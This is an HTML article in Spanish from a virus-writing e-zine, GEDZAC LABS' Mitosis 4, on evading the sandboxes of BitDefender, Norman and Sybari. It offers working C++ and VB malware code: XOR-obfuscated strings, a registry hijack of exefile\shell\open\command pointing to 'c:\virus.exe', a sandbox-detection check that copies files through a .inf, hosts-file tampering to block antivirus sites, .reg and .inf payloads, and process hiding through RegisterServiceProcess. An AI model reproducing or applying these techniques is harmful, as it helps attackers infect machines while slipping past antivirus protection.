
<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0066cc; 
	SCROLLBAR-SHADOW-COLOR: #0066cc; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #0066cc; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style63 {font-family: "Courier New", Courier, monospace; font-size: 14px; color: #f88204; font-weight: bold; }
.style66 {color: #CCCCCC}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style99 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #999999; }
.style100 {font-size: 14px; color: #0066CC; font-weight: bold; font-family: "Courier New", Courier, monospace;}
.style102 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #FF0000; }


-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Forma improvisada de eludir la SandBox del scan de BitDefender,Norman y Sybari.</span><br>
    #Autor: <strong>MachineDramon</strong></span><br>
    <span class="style102">#Este articulo contiene un source</span><br>
    </p>
</div>
  <div align="left" class="style55">
    <p align="justify">      Como lo dice el titulo esta es una forma nada tecnica, pero funciona.Primeramente definiremos lo que es SandBox, para quienes el concepto sea
      nuevo.</p>
    <p align="justify">La Heuristica m&aacute;s convencional consiste en &quot;Leer&quot; el ejecutable y detectar
      cadenas o el nombre de las apis que se usan.</p>
    <p align="justify"> La traduccion de SandBox ser&iacute;a &quot;Caja de Arena&quot;.Lo que hace el av que usa una SandBox es ejecutarnos en una Maquina Virtual
      y analizar que &quot;acciones&quot; realiza el ejecutable, por ejemplo si modifica el
      archivo host, si baja con UrlDownloadToFile un archivo de internet y
      despues lo ejecuta, si empieza a buscar y matar procesos de avs, si modifica
      el mirc.ini, si intercepta la ejecucion de los .exe, si se copia a
      discos de Red, etc. el av salta.</p>
    <p align="justify">Una forma es usando otros recursos, para no hacer las cosas que nos detecta
      directamente(leer SandBox1.txt) pero eso en algunos casos puede resultar
      bastante engorroso.</p>
    <p align="justify">Pero como una SandBox podra emular un SO pero no es un SO, una forma
      de evitar que nos detecte es haciendo algo que podriamos hacer en un SO
      y que no se puede hacer en la SandBox.Tambien hay que se&ntilde;alar que los avs andan mejorando su SandBox, por lo que
      una tecnica puede servir hoy y no ma&ntilde;ana, por ejemplo si uno bajaba un file
      de internet con UrlDownloadToFile y lo ejecutaba con WinExec o CreateProccess
      BitDefender saltaba, pero si uno lo hacia enviando una orden al interprete
      de comandos del ms-dos, no saltaba, hasta hace unos d&iacute;as eso funcionaba
      ahora la SandBox de BitDefender es capaz de analizar las ordenes enviadas
      al interprete de commandos.</p>
    <p align="justify">La idea que se va a exponer es para evitar la deteccion de la SandBox
      que usa el Scanner de estos avs, no me refiero al monitoreo de acciones
      y del reg que hace la vacuna en tiempo real de avs como BitDefender o 
      AVP v5, sino se inutiliza la vacuna, eludir la deteccion del scan no sirve
      de nada, pero este texto no trata de la vacuna.</p>
    <p align="justify">Bueno la idea es crear un A.txt en el disco c:\, luego crear un copy.inf
      para que copie A.txt como B.txt en el mismo c:\, luego comprobar la
      existencia de C:\B.txt ,si no existe hacemos un ExitProcess(0), si existe
      seguimos con la ejecucion normal.</p>
    <p align="justify">Copiar un file con un .inf es posible en un SO verdadero, pero aun no esta
      soportado pos las SandBox de estos avs.</p>
    <p align="justify">Pasemos a la parte Practica:<br>
      ------------------------------<br>
      Aqui tenemos un codigo que modifica una llave del reg para interceptar la
      ejecucion de los .exe y es detectado por el scaner como:</p>
    <p align="justify">BitDefender: BehavesLike:Trojan.ShellReg</p>
    <p align="justify">Norman y Sybari: W32/Malware</p>
    <p class="style99">//-------------------------------------------------------------------------<br>
  #include &lt;windows.h&gt;</p>
    <p class="style99">//funcion de encriptacion<br>
  void e(char *sz) { for (unsigned int i=0; i&lt;strlen(sz); i++) { sz[i]=sz[i] ^ 7; } }</p>
    <p class="style99">//funcion para escribir datos REG_SZ en el reg<br>
    void rwsz(HKEY key, char *sk, char *k, char *v)<br>
    {<br>
    HKEY hKey;<br>
    RegCreateKey(key, sk, &amp;hKey);<br>
    RegSetValueEx(hKey, k, 0, REG_SZ,(LPBYTE)v, lstrlen(v)+1);<br>
    RegCloseKey(hKey);<br>
    }</p>
    <p class="style99">int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil)<br>
    {<br>
    //cad1 = exefile\shell\open\command <br>
    char cad1[]=&quot;bbankb[tobkk[hwbi[dhjjfic&quot;; e(cad1);<br>
    <br>
    //cad2 = c:\virus.exe &quot;%1&quot; %*<br>
    char cad2[]=&quot;d=[qnurt)bb'%\&quot;6%'\&quot;-&quot;; e(cad2);<br>
    <br>
    rwsz(HKEY_CLASSES_ROOT,cad1,&quot;&quot;,cad2);<br>
    }<br>
    //-------------------------------------------------------------------------</p>
    <p class="style99">Ahora un codigo que hace lo mismo, pero haciendo la verificacion de si se<br>
    ejecuta en una SandBox<br>
    //-------------------------------------------------------------------------<br>
    #include &lt;windows.h&gt;</p>
    <p class="style99">LPSTR argumentos;</p>
    <p class="style99">//funcion para verificar la existencia de un archivo<br>
    bool FileExist(char *dir, char *file)<br>
    {<br>
    char b[MAX_PATH], *p;<br>
    DWORD r = SearchPath(dir,file,NULL,sizeof(b),b, &amp;p);<br>
    if (r==0) { return 0; } else { return 1; }<br>
    }</p>
    <p class="style99">//funcion de encriptacion<br>
  void e(char *sz) { for (unsigned int i=0; i&lt;strlen(sz); i++) { sz[i]=sz[i] ^ 7; } }</p>
    <p class="style99">//funcion para escribir datos REG_SZ en el reg<br>
    void rwsz(HKEY key, char *sk, char *k, char *v)<br>
    {<br>
    HKEY hKey;<br>
    RegCreateKey(key, sk, &amp;hKey);<br>
    RegSetValueEx(hKey, k, 0, REG_SZ,(LPBYTE)v, lstrlen(v)+1);<br>
    RegCloseKey(hKey);<br>
    }</p>
    <p class="style99">int MainAlias()<br>
    {<br>
    //cad1 = exefile\shell\open\command <br>
    char cad1[]=&quot;bbankb[tobkk[hwbi[dhjjfic&quot;; e(cad1);<br>
    <br>
    //cad2 = c:\virus.exe &quot;%1&quot; %*<br>
    char cad2[]=&quot;d=[qnurt)bb'%\&quot;6%'\&quot;-&quot;; e(cad2);<br>
    <br>
    rwsz(HKEY_CLASSES_ROOT,cad1,&quot;&quot;,cad2);<br>
    }</p>
    <p class="style99">int IniciaVerificacion(void)<br>
    { <br>
    DWORD dw; char mpath[MAX_PATH];<br>
    //obtenemos la ruta del virus<br>
    GetModuleFileName(NULL,mpath,sizeof(mpath));<br>
    <br>
    //copiamos los 3 primeros caracteres de la ruta que vendrian a ser<br>
    //la unidad de disco y &quot;:\&quot;, ejemplo: &quot;c:\&quot;, y ponemos el caracter<br>
    //nulo al final, porque strncpy no nos lo pone automaticamente<br>
    char aq[20]; strncpy(aq,mpath,3); aq[3]='\0';<br>
    //vars<br>
    char v[] = &quot;GEDZAC_LABS&quot;;<br>
    char gt[]=&quot;B.TXT&quot;;<br>
    char b[] = &quot;A.TXT&quot;;<br>
    <br>
    //si B.TXT ya existe salimos<br>
    if(FileExist(&quot;C:\\&quot;,gt)) { return 0; }<br>
    <br>
    //concatenamos aq y b, obteniendo &quot;C:\A.TXT&quot;<br>
    strcat(aq,b);<br>
    //creamos C:\A.TXT y le escribimos cualquier cosa dentro<br>
    HANDLE vf = CreateFile(aq,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,0,0);<br>
    //si error, salimos<br>
    if (vf==INVALID_HANDLE_VALUE) return 0;<br>
    WriteFile(vf,v,strlen(v),&amp;dw,0);<br>
    CloseHandle(vf);</p>
    <p class="style99"> //volvemos a poner el null en la 4&deg; posicion de aq y concatenamos<br>
    //obteniendo C:\copy.inf<br>
    aq[3]='\0';<br>
    strcat(aq,&quot;copy.inf&quot;);<br>
    <br>
    //contenido de copy.inf<br>
    char c[]=&quot;[Version]\r\nSignature=\&quot;$Chicago$\&quot;\r\nProvider=GEDZAC\r\n\r\n[DefaultInstall]\r\nCopyFiles=Gedzac.Copy.1\r\n\r\n[DestinationDirs]\r\nGedzac.Copy.1=30\r\n\r\n[SourceDisksNames]\r\n1 = \&quot;Disco Raiz\&quot;,,,\\\r\n\r\n[SourceDisksFiles]\r\nA.TXT=1\r\n\r\n[Gedzac.Copy.1]\r\nB.TXT, A.TXT\r\n&quot;;<br>
    <br>
    //creamos copy.inf y escribimos el contenido<br>
    HANDLE va = CreateFile(aq,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,0,0);<br>
    //si error salimos<br>
    if (va==INVALID_HANDLE_VALUE) return 0;<br>
    WriteFile(va,c,lstrlen(c),&amp;dw,0);<br>
    CloseHandle(va);</p>
    <p class="style99"> //ejecutamos la accion &quot;install&quot; asociada a los .inf para ejecutarlo<br>
  ShellExecute(NULL,&quot;install&quot;,aq, NULL, NULL, SW_HIDE);<br>
    //esperamos 1seg.<br>
    Sleep(1000);<br>
    }</p>
    <p class="style99">int TerminaVerificacion(void)<br>
    {<br>
    char gt[]=&quot;B.TXT&quot;; int c=0;<br>
    //iniciamos un bucle<br>
    while(1)<br>
    {<br>
    //si aun no existe el archivo, esperamos 1seg y aumentamos<br>
    //c, si ya existe ejecutamos MainAlias()<br>
    if(FileExist(&quot;C:\\&quot;,gt)) { MainAlias(); break; }<br>
    Sleep(1000); c++;<br>
    //si pasados 30seg aun no existe, estamos en una sandbox y salimos<br>
    if (c &gt; 30) break;<br>
    }<br>
    }</p>
    <p><span class="style99">int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil)<br>
    {<br>
    IniciaVerificacion();<br>
    <br>
    //copiamos los argumentos con los que se aya ejecutado el programa en la<br>
    //var global argumentos para asi poder usarlos en MainAlias si se necesita<br>
    //esto es opcional, solo si se usa el argumento lpszArgument de WinMain<br>
    argumentos = lpszArgument;<br>
    <br>
    TerminaVerificacion();<br>
    return 0;<br>
    }<br>
    //-------------------------------------------------------------------------</span><br>
    </p>
    <p align="justify">Ahora voy a decir algunas cosas que me parecieron interesantes
      sobre las sandbox, tampoco es el mejor metodo para eludirlas, porque<br>
      el virus deberia reconocer si se ejecuta en una sandbox o no, estas solo
      son ideas que tal vez nos puedan ayudar en algunos casos.</p>
    <p align="justify">Hace unos d&iacute;as estaba teniendo problemas con las sandbox de Norman y
      Bitdefender.</p>
    <p align="justify">Primero:<br>
      --------<br>
      Cuando trataba de modificar el archivo host(el del dns) para dirigir
      algunas direcciones de avs a la direcion del localhost(127.0.0.1)
      bastaba que el programa tocara el host para que bitdefender saltara con
      que SiteHijack osea secuestro del navegador.<br>
      Primero se me ocurrio copiar el host, modificarlo y hacer que win reemplaze
      el original por el modificado en el siguiente reinicio, esto lo hacemos con 
      el wininit.ini en los 9x/Me y MoveFileEx en los 2000/XP</p>
    <p align="justify">El wininit.ini es un archivo ubicado en el directorio de windows en los
      9x/Me que indica al SO mover/renombrar o eliminar un archivo en el siguiente
      reinicio, la sintaxis del wininit.ini es:</p>
    <p align="justify">[Rename]<br>
      destino=fileOrigen</p>
    <p align="justify">Donde indica que fileOrigen sera movido a destino en el prox reinicio,
      destino y fileOrigen deben ser rutas en formato ms-dos, osea maximo 8 caracteres por nombres de carpeta y archivo y 3 caracteres por extencion, para
      obtener la ruta en formato ms-dos o formato corto se puede usar GetShortPathName
      (si a GetShortPathName se le pasa una ruta de un file o folder que no existe
      devuelve basura, nose porque)</p>
    <p align="justify">si se quiere eliminar archivos:</p>
    <p align="justify">Nul=fileOrigen</p>
    <p align="justify">La sintaxis de MoveFileEx en este caso:<br>
      MoveFileEx(fileOrigen,destino,MOVEFILE_DELAY_UNTIL_REBOOT)</p>
    <p align="justify">Como 3&deg; argumento usamos MOVEFILE_DELAY_UNTIL_REBOOT para indicar que se <br>
      mueva en el sig reinicio, hay otras opciones, pero la que nos interesa para<br>
      esto es esa.<br>
      Si se quiere borrar un file: MoveFileEx(fileOrigen,0,MOVEFILE_DELAY_UNTIL_REBOOT)<br>
      Lo que hace la funcion es crear un valor Multi_SZ, donde indica a win lo que debe<br>
      mover al prox reinicio:</p>
    <p align="justify">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations</p>
    <p align="justify">(interesante para matar esos servicios de avs que no se dejan tocar en el xp)</p>
    <p align="justify">Como segunda opcion para hacer esto, pos una cosa que he notado en la
      sandbox de norman y bitdefender, no se si sera asi en otras, al ejecutarse
      el programa en la sandbox, el av analiza las acciones del programa, debe
      ser algo como debugearlo, ahora si:</p>
    <p align="justify">Virus -&gt; Mala Accion     (Virus Encontrado)</p>
    <p align="justify">pero si:</p>
    <p align="justify">Virus -&gt; otro programa -&gt; Mala Accion   (No Virus Encontrado)</p>
    <p align="justify">---------------------------------------------------------------------------<br>
      Actualizacion: la sandbox de BitDefender ya analiza y detecta
      las ordenes que enviamos al command.com o cmd.exe
      por lo que el metodo que se detalla abajo, ya no serviria con ese av.<br>
      ---------------------------------------------------------------------------</p>
    <p align="justify">Osea digamos si virus hace una copia de host, la modifica y luego la quiere
      copiar encima con CopyFile(copia, host, 0) el av salta, porque estamos
      sobreescribiendo el host (igual si lo abrimos y lo modificamos), pos
      entonces tenemos que hacer que otro programa lo copie, para eso usamos
      el interprete de comandos del ms-dos (command.com o cmd.exe), al que le
      dariamos la orden &quot;copy copia host /Y&quot;, en c++ se puede usar funcion system
      del stdlib.h -&gt; system(&quot;copy copia host /Y&quot;) , en vb:
      Call Shell(Environ$(&quot;Comspec&quot;) &amp; &quot; /c copy copia host /Y&quot;, vbHide)
      o se puede usar GetEnvironmentVariable para averiguar el valor de
      %comspec% y luego con WinExec ejecutar      &quot;%valor de comspec&quot; + &quot; /c copy copia host /Y&quot;
      en vbs o js podemos usar .ExpandEnvironmentStrings del objeto
      WScript.Shell para averiguar el valor de %comspec% y ejecutar
      con el metodo .Run del mismo objeto      &quot;%valor de comspec&quot; + &quot; /c copy copia host /Y&quot;<br>
    </p>
    <p align="justify">Segundo:<br>
      -----------</p>
    <p align="justify">Cuando escribia en el registro la llave para interceptar los .exes<br>
      HKEY_CLASSES_ROOT\exefile\shell\open\command</p>
    <p align="justify">Norman saltaba con que &quot;SandBox detected New Malware&quot;</p>
    <p align="justify">Entonces siguiendo la tactica de: Virus -&gt;otro programa -&gt;Mala Accion
      en ves de usar RegSetValueEx para setear el valor, vamos a usar el regedit.
      creamos un archivo .reg, con lo que queremos a&ntilde;adir al registro<br>
      por ejemplo:</p>
    <p align="justify">REGEDIT4</p>
    <p align="justify">[HKEY_CLASSES_ROOT\exefile\shell\open\command]<br>
      @=&quot;c:\\ruta\\virus.exe \&quot;%1\&quot; %*&quot;</p>
    <p align="justify">y lo ejecutamos con WinExec(&quot;regedit /s c:\ruta\file.reg&quot;,0)<br>
      Con los archivos .reg se pueden crear, borrar llaves, cambiar valores.</p>
    <p align="justify">Otra opcion seria usar un .inf ,con un .inf se pueden a&ntilde;adir, borrar valores
      en el registro, copiar, borrar, renombrar archivos, editar archivos .ini
      registrar .dll ,crear servicios. (en este .zip hay algunos inf de ejemplo)</p>
    <p align="justify">Eso sucede cuando sobre un .inf hacemos click botton derecho y seleccionamos 
      la opcion &quot;Instalar&quot; del men&uacute; contextual. Ahora si vamos al registro a ver
      que ejecuta win en la accion Instalar (llamada Install en el registro)</p>
    <p align="justify">HKEY_CLASSES_ROOT\inffile\shell\install\command</p>
    <p align="justify">vemos segun el sistema operativo:</p>
    <p align="justify">Win9x/WinME<br>
      C:\WINDOWS\rundll.exe setupx.dll,InstallHinfSection DefaultInstall 132 %1</p>
    <p align="justify">Win2000/XP<br>
      %SystemRoot%\System32\rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %1</p>
    <p align="justify">Entonces lo que habria que ejecutar segun el SO seria:<br>
      para los 9x/Me<br>
      C:\WINDOWS\rundll.exe setupx.dll,InstallHinfSection DefaultInstall 132 c:\ruta\file.inf<br>
      para los 2000/xp<br>
      C:\WINDOWS\System32\rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 c:\ruta\file.inf</p>
    <p align="justify">Entonces se podria averiguar el dir de windows, luego ver que 
      version de win es en la que nos ejecutamos, y luego ejecutar con WinExec,<br>
      pero pa no complicarnos la vida usamos ShellExecute indicando que ejecute
      la opcion &quot;install&quot; del archivo .inf</p>
    <p align="justify">VB:<br>
      Call ShellExecute(Form1.hWnd, &quot;install&quot;, &quot;C:\ruta\file.inf&quot;, vbNullString, vbNullString, 0)</p>
    <p align="justify">C++:<br>
      ShellExecute(NULL,&quot;install&quot;,&quot;C:\ruta\file.inf&quot;, NULL, NULL, SW_HIDE);</p>
    <p align="justify">El archivo .inf seria algo como:</p>
    <p align="justify">[Version]<br>
      Signature=&quot;$Chicago$&quot;<br>
      Provider=GEDZAC</p>
    <p align="justify">[DefaultInstall]<br>
      AddReg=GedReg</p>
    <p align="justify">[GedReg]<br>
      HKCR, exefile\shell\open\command,,0x00000000,&quot;c:\ruta\virus.exe &quot;&quot;%1&quot;&quot; %*&quot;<br>
    </p>
    <p align="justify">Mas Info: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/install/hh/install/inf-format_0a6b2b92-442b-4295-ab95-5011ab9d8dbb.xml.asp</p>
    <p align="justify">Tercero:<br>
      ---------<br>
      Luego otra cosa que el nod32 andaba molestando con su heuristica, era esa
      api pa ocultar el proceso en los 9x/Me , RegisterServiceProcess</p>
    <p align="justify">Esta funcion nos pide como 1&deg; argumento un PID (identificador de proceso)
      y como 2&deg;argumento podemos elegir:<br>
      <span class="style99">Const RSP_SIMPLE_SERVICE = 1</span>       (oculta el proceso)<br>
      <span class="style99">Const RSP_UNREGISTER_SERVICE = 0</span>   (lo hace visible)</p>
    <p align="justify">Si la usamos en C++ usando una funcion de encriptacion y getprocaddress
      ya no la detecta (este metodo ser mucho conocido)</p>
    <p class="style99">//declaramos un puntero del tipo api, es el puntero que recibira la<br>
    //direccion de la funcion, observese que se indica que se usara como<br>
    //argumentos 2 valores DWORD (enteros largos)<br>
    typedef DWORD (WINAPI *HDP) (DWORD, DWORD);</p>
    <p class="style99">//esta ser la funcion de encriptacion ,usa una operacion Xor<br>
  void e(char *sz) { for (unsigned int i=0; i&lt;strlen(sz); i++) { sz[i]=sz[i] ^ 7; } }</p>
    <p class="style99">int HideProcess()<br>
    {<br>
    //en este char dice &quot;RegisterServiceProcess&quot; ,pasamos f a la funcion e()<br>
    //y nos devuelve f desencriptado<br>
    char f[]=&quot;Ub`ntsbuTbuqndbWuhdbtt&quot;; e(f);</p>
    <p class="style99"> //cargamos la .dll donde se encuentra la funcion<br>
  HMODULE dh = LoadLibrary(&quot;KERNEL32.DLL&quot;);</p>
    <p class="style99"> //si nos devuelve 0 salimos, si tiene exito debe devolver un numero en dh<br>
    if (!dh) return 0;</p>
    <p class="style99"> //luego declaramos Rgp como el tipo de puntero definido antes HDP<br>
    //y llamamos a GetProcAddress pasando el handle a la .dll cargada<br>
    //y el nombre de la funcion de la que se quiere obtener la direccion<br>
    //a GetProcAddress le anteponemos (HDP) para que el valor que devuelve<br>
    //se convierta al tipo del puntero HDP<br>
    HDP Rgp = (HDP)GetProcAddress(dh,f);</p>
    <p class="style99"> //si el puntero Rgp no es nulo, lo usamos para llamar a la funcion<br>
    //como si el puntero fuera el nombre de la funcion, GetCurrentProcessId<br>
    //nos da nuestro PID<br>
    if (Rgp) { Rgp(GetCurrentProcessId(),1); }</p>
    <p><span class="style99"> //como ya no nesecitamos la .dll la descargamos<br>
    FreeLibrary(dh);<br>
    return 1;<br>
    }</span><br>
    </p>
    <p>Si la usamos en VB:</p>
    <p class="style99">Private Declare Function GetCurrentProcessId Lib &quot;kernel32&quot; () As Long<br>
  Private Declare Function RegisterServiceProcess Lib &quot;kernel32&quot; (ByVal dwProcessId As Long, ByVal dwType As Long) As Long</p>
    <p class="style99">'de esta forma funciona pero nod32 detecta por heuristica<br>
    Sub HideProcess()<br>
    On Error Resume Next<br>
    Call RegisterServiceProcess(GetCurrentProcessId(), 1)<br>
    End Sub</p>
    <p class="style99">'Podemos hacer el sub as&iacute; y llamarla con CallByName:<br>
  Call CallByName(Me, &quot;Hideprocess3&quot;, VbMethod, GetCurrentProcessId(), 1)<br>
  '1&deg; arg. el objeto que contiene la funcion, en este caso form1 o Me<br>
  '2&deg; arg. el nombre de la funcion<br>
  '3&deg; arg. indica que se ejecutara un &quot;Metodo&quot; del objeto, osea <br>
  ;un sub o funcion, m&aacute;s info sobre los posibles valores de este argumento<br>
    ;http://msdn.microsoft.com/library/spa/default.asp?url=/library/SPA/vblr7/html/vacstcalltype.asp<br>
    '4&deg;-n&deg; arg. lista de argumentos que se pasan a la funcion o sub.<br>
    'asi no detecta<br>
    Sub HideProcess3(pid As Long, fl As Long)<br>
    On Error Resume Next<br>
    Call RegisterServiceProcess(pid, fl)<br>
    End Sub</p>
    <p class="style99">'O viendo que el Nod32 reacciona cuando se llaman juntas a las funciones<br>
    'RegisterServiceProcess y GetCurrentProcessId, podemos obtener el PID de <br>
    'otra forma</p>
    <p class="style99">Private Declare Function GetWindowThreadProcessId Lib &quot;user32&quot; (ByVal hWnd As Long, lpdwProcessId As Long) As Long</p>
    <p class="style99">'Usamos GetWindowThreadProcessId para obtener el PID, esa api regresa<br>
    'un valor long con el identificador de hilo de la ventana cuyo hwnd se le<br>
    'pase como 1&deg;argumento (en este caso el form1.hwnd), pero ahora lo que nos<br>
    'interesa es el 2&deg; argumento, si le pasamos un valor long en ese campo<br>
    'regresa el PID de proceso de la ventana. Ya que tenemos nuestro PID<br>
    'llamamos normal a RegisterServiceProcess<br>
    Sub HideProcess2()<br>
    On Error Resume Next<br>
    Dim pid As Long<br>
    Call GetWindowThreadProcessId(Form1.hWnd, pid)<br>
    Call RegisterServiceProcess(pid, 1)<br>
    End Sub<br>
    </p>
    <p class="style99">O asi: pasando 0 en lugar de nuestro PID, cero le dice a la funcion que es<br>
    el PID del proceso que la esta llamando.</p>
    <p class="style99">Sub HideProcess4()<br>
    On Error Resume Next<br>
    Call RegisterServiceProcess(0, 1)<br>
    End Sub</p>
    <p class="style99">'Tambien se podria usar las funciones ToolHelp32 para obtener nuestro PID<br>
    'pero como que no se me hace muy practico</p>
    <p>Recordar que la api RegisterServiceProcess solo funka en 9x/Me ,para decidir
      cuando usarla y cuando no, evaluar la version de windows con GetVersionExA
      y la estructura OSVERSIONINFO, el miembro .dwPlatformId de la estructura 
      sera 1 si es win9x/Me y 2 si es win2000/XP<br>
    </p>
    <p>Ojala les sirva de algo este texto, Un Saludo</p>
    <p align="right" class="style100">(C) Mitosis 4 - GEDZAC LABS</p>
</div>
</body>
</html>
